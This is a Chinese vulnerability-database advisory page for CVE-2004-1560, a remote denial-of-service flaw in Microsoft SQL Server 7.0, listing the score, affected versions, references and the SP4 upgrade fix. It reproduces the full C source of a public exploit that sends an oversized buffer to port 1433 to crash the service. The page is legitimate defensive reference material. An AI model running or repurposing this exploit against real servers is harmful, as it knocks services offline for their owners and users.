CVE-2004-1560
CVSS5.0
发布时间 :2004-12-31 00:00:00
修订时间 :2016-10-17 22:56:30
NMCOE    

[原文]Microsoft SQL Server 7.0 allows remote attackers to cause a denial of service (mssqlserver service halt) via a long request to TCP port 1433, possibly triggering a buffer overflow.


[CNNVD]Microsoft SQL Server远程服务拒绝漏洞(CNNVD-200412-305)

        Microsoft SQL Server 7.0版本存在漏洞。远程攻击者借助到TCP端口1433的超长请求导致服务拒绝(MSSQLServer服务暂停),还可能触发缓冲区溢出。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:microsoft:sql_server:7.0Microsoft SQLServer 7.0
cpe:/a:microsoft:sql_server:7.0:sp3Microsoft SQL Server 7.0 Service Pack 3
cpe:/a:microsoft:sql_server:7.0:sp4Microsoft SQL Server 7.0 Service Pack 4
cpe:/a:microsoft:sql_server:7.0:sp1Microsoft SQL Server 7.0 Service Pack 1
cpe:/a:microsoft:sql_server:7.0:sp2Microsoft SQL Server 7.0 Service Pack 2

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1560
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1560
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-305
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109650760210411&w=2
(UNKNOWN)  BUGTRAQ  20040928 MSSQL 7.0 DoS
http://packetstormsecurity.nl/0410-exploits/mssql.7.0.dos.c
(UNKNOWN)  MISC  http://packetstormsecurity.nl/0410-exploits/mssql.7.0.dos.c
http://securitytracker.com/id?1011434
(UNKNOWN)  SECTRACK  1011434
http://www.securityfocus.com/bid/11265
(UNKNOWN)  BID  11265
http://xforce.iss.net/xforce/xfdb/17542
(UNKNOWN)  XF  mssql-data-buffer-dos(17542)

- 漏洞信息

Microsoft SQL Server远程服务拒绝漏洞
中危 缓冲区溢出
2004-12-31 00:00:00 2005-10-20 00:00:00
远程  
        Microsoft SQL Server 7.0版本存在漏洞。远程攻击者借助到TCP端口1433的超长请求导致服务拒绝(MSSQLServer服务暂停),还可能触发缓冲区溢出。
        

- 公告与补丁

        Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: vuldb@securityfocus.com .

- 漏洞信息 (562)

MSSQL 7.0 Remote Denial of Service Exploit (EDBID:562)
windows dos
2004-09-29 Verified
0 securma massine
N/A [点击下载]
/* Microsoft mssql 7.0 server is vulnerable to denial of service attack
* By sending a large buffer with specified data an attacker can stop
the service
* "mssqlserver" the error noticed is different according to services'
pack but the result is always
* the same one.
* Exception Codes = c0000005
* vulnerable: MSSQL7.0 sp0 - sp1 - sp2 - sp3
* This code is for educational purposes, I am not responsible for your acts
* Greets:sm0g DEADm|x #crack.fr itmaroc and evryone who I forgot */

#include <stdio.h>
#include <winsock.h>

#pragma comment(lib,"ws2_32")
u_long resolv(char*);


void main(int argc, char **argv) {
WSADATA WinsockData;
SOCKET s;
int i;
struct sockaddr_in vulh;
char buffer[700000];
for(i=0;i<700000;i+=16)memcpy(buffer+i,"\x10\x00\x00\x10\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc\xcc",16);


if (argc!=3) {
printf(" MSSQL denial of service\n");
printf(" by securma massine\n");
printf("Cet outil a ete cree pour test ,je ne suis en aucun cas
responsable des degats que vous pouvez en faire\n");
printf("Syntaxe: MSSQLdos <ip> <port>\n");
exit(1);
}

WSAStartup(0x101,&WinsockData);
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);

ZeroMemory(&vulh,sizeof(vulh));
vulh.sin_family=AF_INET;
vulh.sin_addr.s_addr=resolv(argv[1]);
vulh.sin_port=htons(atoi(argv[2]));
if (connect(s,(struct sockaddr*)&vulh,sizeof(vulh))==SOCKET_ERROR) {
printf("Impossible de se connecter...le port est en generale 1433...\n");
exit(1);
}

{
send(s,buffer,sizeof(buffer),0);

printf("Data envoyes...\n");
}
printf("\nattendez quelques secondes et verifiez que le serveur ne
repond plus.\n");
closesocket(s);
WSACleanup();
}


u_long resolv(char *host_name) {
struct in_addr addr;
struct hostent *host_ent;

if ((addr.s_addr = inet_addr(host_name)) == -1) {
if (!(host_ent = gethostbyname(host_name))) {
printf ("Erreur DNS : Impossible de résoudre l'adresse %s
!!!\n",host_name);
exit(1);
}
CopyMemory((char *)&addr.s_addr,host_ent->h_addr,host_ent->h_length);
}
return addr.s_addr;
}

// milw0rm.com [2004-09-29]
		

- 漏洞信息

10379
Microsoft SQL Server Large Query DoS
Remote / Network Access Denial of Service
Loss of Availability
Exploit Public

- 漏洞描述

SQL Server contains a flaw that may allow a remote denial of service. The issue is triggered when a large buffer with specially crafted data occurs, and will result in loss of availability for the mssqlserver service.

- 时间线

2004-09-28 Unknow
2004-09-28 Unknow

- 解决方案

Upgrade to version 7.0 SP4 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站